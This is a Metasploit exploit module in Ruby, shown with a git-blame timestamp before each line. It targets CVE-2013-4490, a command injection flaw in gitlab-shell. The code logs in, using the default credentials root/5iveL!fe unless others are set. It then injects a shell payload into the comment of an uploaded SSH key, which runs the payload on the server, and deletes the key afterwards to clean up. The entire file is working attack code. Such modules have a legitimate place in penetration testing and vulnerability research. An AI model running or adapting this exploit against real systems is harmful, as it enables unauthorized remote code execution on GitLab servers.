2014-08-06 03:21:57 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-08-06 03:21:57 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'net/ssh'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::CmdStager
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Gitlab-shell Code Execution',
|
|
|
|
'Description' => %q(
|
2014-08-15 14:10:08 +00:00
|
|
|
This module takes advantage of the addition of authorized
|
|
|
|
ssh keys in the gitlab-shell functionality of Gitlab. Versions
|
|
|
|
of gitlab-shell prior to 1.7.4 used the ssh key provided directly
|
|
|
|
in a system call resulting in a command injection vulnerability. As
|
2014-08-18 18:35:34 +00:00
|
|
|
this relies on adding an ssh key to an account, valid credentials
|
2014-08-15 14:10:08 +00:00
|
|
|
are required to exploit this vulnerability.
|
2014-08-06 03:21:57 +00:00
|
|
|
),
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Brandon Knight'
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
|
|
|
|
['CVE', '2013-4490']
|
|
|
|
],
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2014-08-15 14:10:08 +00:00
|
|
|
[ 'Linux',
|
|
|
|
{
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Arch' => ARCH_X86
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Linux (x64)',
|
|
|
|
{
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Arch' => ARCH_X86_64
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Unix (CMD)',
|
|
|
|
{
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Payload' =>
|
2014-08-06 03:21:57 +00:00
|
|
|
{
|
2014-08-15 14:10:08 +00:00
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'RequiredCmd' => 'openssl perl python'
|
|
|
|
},
|
2014-08-14 00:26:48 +00:00
|
|
|
'BadChars' => "\x22"
|
2014-08-06 03:21:57 +00:00
|
|
|
}
|
2014-08-15 14:10:08 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Python',
|
|
|
|
{
|
|
|
|
'Platform' => 'python',
|
|
|
|
'Arch' => ARCH_PYTHON,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x22"
|
|
|
|
}
|
|
|
|
}
|
|
|
|
]
|
2014-08-06 03:21:57 +00:00
|
|
|
],
|
|
|
|
'CmdStagerFlavor' => %w( bourne printf ),
|
|
|
|
'DisclosureDate' => 'Nov 4 2013',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),
|
|
|
|
OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),
|
|
|
|
OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2014-08-10 23:53:33 +00:00
|
|
|
login
|
2014-08-14 00:26:48 +00:00
|
|
|
case target['Platform']
|
|
|
|
when 'unix'
|
2014-08-06 03:21:57 +00:00
|
|
|
execute_command(payload.encoded)
|
2014-08-14 00:26:48 +00:00
|
|
|
when 'python'
|
|
|
|
execute_command("python -c \\\"#{payload.encoded}\\\"")
|
|
|
|
when 'linux'
|
2014-08-06 03:21:57 +00:00
|
|
|
execute_cmdstager(temp: './', linemax: 2800)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute_command(cmd, _opts = {})
|
2014-08-10 23:53:33 +00:00
|
|
|
key_id = add_key(cmd)
|
|
|
|
delete_key(key_id)
|
2014-08-06 03:21:57 +00:00
|
|
|
end
|
|
|
|
|
2014-08-14 00:26:48 +00:00
|
|
|
def check
|
|
|
|
res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
|
2014-08-15 14:10:08 +00:00
|
|
|
if res && res.body && res.body.include?('GitLab')
|
2014-08-14 00:26:48 +00:00
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-08-06 03:21:57 +00:00
|
|
|
def login
|
|
|
|
username = datastore['USERNAME']
|
|
|
|
password = datastore['PASSWORD']
|
2014-08-14 00:26:48 +00:00
|
|
|
signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
|
2014-08-06 03:21:57 +00:00
|
|
|
|
|
|
|
# Get a valid session cookie and authenticity_token for the next step
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => 'request_method=GET',
|
|
|
|
'uri' => signin_page
|
|
|
|
)
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
|
2014-08-06 03:21:57 +00:00
|
|
|
|
2014-08-11 23:54:10 +00:00
|
|
|
local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
|
2014-08-06 03:21:57 +00:00
|
|
|
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
|
|
|
|
|
2014-08-11 23:54:10 +00:00
|
|
|
if res.body.include? 'user[email]'
|
|
|
|
@gitlab_version = 5
|
|
|
|
user_field = 'user[email]'
|
|
|
|
else
|
|
|
|
@gitlab_version = 7
|
|
|
|
user_field = 'user[login]'
|
|
|
|
end
|
|
|
|
|
2014-08-06 03:21:57 +00:00
|
|
|
# Perform the actual login and get the newly assigned session cookie
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'POST',
|
2014-08-10 23:53:33 +00:00
|
|
|
'cookie' => local_session_cookie,
|
2014-08-06 03:21:57 +00:00
|
|
|
'uri' => signin_page,
|
|
|
|
'vars_post' =>
|
|
|
|
{
|
|
|
|
'utf8' => "\xE2\x9C\x93",
|
|
|
|
'authenticity_token' => auth_token,
|
2014-08-11 23:54:10 +00:00
|
|
|
"#{user_field}" => username,
|
2014-08-06 03:21:57 +00:00
|
|
|
'user[password]' => password,
|
|
|
|
'user[remember_me]' => 0
|
|
|
|
}
|
|
|
|
)
|
|
|
|
|
2014-08-14 00:26:48 +00:00
|
|
|
fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
|
2014-08-06 03:21:57 +00:00
|
|
|
|
2014-08-11 23:54:10 +00:00
|
|
|
@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
|
2014-08-15 14:10:08 +00:00
|
|
|
|
|
|
|
fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
|
2014-08-06 03:21:57 +00:00
|
|
|
end
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
def add_key(cmd)
|
2014-08-11 23:54:10 +00:00
|
|
|
if @gitlab_version == 5
|
2014-08-14 00:26:48 +00:00
|
|
|
@key_base = normalize_uri(target_uri.path.to_s, 'keys')
|
2014-08-11 23:54:10 +00:00
|
|
|
else
|
2014-08-14 00:26:48 +00:00
|
|
|
@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
|
2014-08-11 23:54:10 +00:00
|
|
|
end
|
2014-08-06 03:21:57 +00:00
|
|
|
|
|
|
|
# Perform an initial request to get an authenticity_token so the actual
|
|
|
|
# key addition can be done successfully.
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'GET',
|
2014-08-10 23:53:33 +00:00
|
|
|
'cookie' => "request_method=GET; #{@session_cookie}",
|
2014-08-11 23:54:10 +00:00
|
|
|
'uri' => normalize_uri(@key_base, 'new')
|
2014-08-06 03:21:57 +00:00
|
|
|
)
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
|
2014-08-06 03:21:57 +00:00
|
|
|
|
|
|
|
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
|
|
|
|
title = rand_text_alphanumeric(16)
|
|
|
|
key_info = rand_text_alphanumeric(6)
|
|
|
|
|
|
|
|
# Generate a random ssh key
|
|
|
|
key = OpenSSL::PKey::RSA.new 2048
|
|
|
|
type = key.ssh_type
|
|
|
|
data = [key.to_blob].pack('m0')
|
|
|
|
|
|
|
|
openssh_format = "#{type} #{data}"
|
|
|
|
|
|
|
|
# Place the payload in to the key information to perform the command injection
|
|
|
|
key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'POST',
|
2014-08-10 23:53:33 +00:00
|
|
|
'cookie' => "request_method=GET; #{@session_cookie}",
|
2014-08-11 23:54:10 +00:00
|
|
|
'uri' => @key_base,
|
2014-08-06 03:21:57 +00:00
|
|
|
'vars_post' =>
|
|
|
|
{
|
|
|
|
'utf8' => "\xE2\x9C\x93",
|
|
|
|
'authenticity_token' => auth_token,
|
|
|
|
'key[title]' => title,
|
|
|
|
'key[key]' => key
|
|
|
|
}
|
|
|
|
)
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
|
2014-08-06 03:21:57 +00:00
|
|
|
|
|
|
|
# Get the newly added key id so it can be used for cleanup
|
|
|
|
key_id = res.headers['Location'].split('/')[-1]
|
|
|
|
|
|
|
|
key_id
|
|
|
|
end
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
def delete_key(key_id)
|
2014-08-06 03:21:57 +00:00
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'GET',
|
2014-08-10 23:53:33 +00:00
|
|
|
'cookie' => "request_method=GET; #{@session_cookie}",
|
2014-08-11 23:54:10 +00:00
|
|
|
'uri' => @key_base
|
2014-08-06 03:21:57 +00:00
|
|
|
)
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
|
2014-08-06 03:21:57 +00:00
|
|
|
|
|
|
|
auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
|
|
|
|
|
|
|
|
# Remove the key which was added to clean up after ourselves
|
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'POST',
|
2014-08-10 23:53:33 +00:00
|
|
|
'cookie' => "#{@session_cookie}",
|
2014-08-11 23:54:10 +00:00
|
|
|
'uri' => normalize_uri("#{@key_base}", "#{key_id}"),
|
2014-08-06 03:21:57 +00:00
|
|
|
'vars_post' =>
|
|
|
|
{
|
|
|
|
'_method' => 'delete',
|
|
|
|
'authenticity_token' => auth_token
|
|
|
|
}
|
|
|
|
)
|
|
|
|
|
2014-08-10 23:53:33 +00:00
|
|
|
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
|
2014-08-06 03:21:57 +00:00
|
|
|
end
|
|
|
|
end
|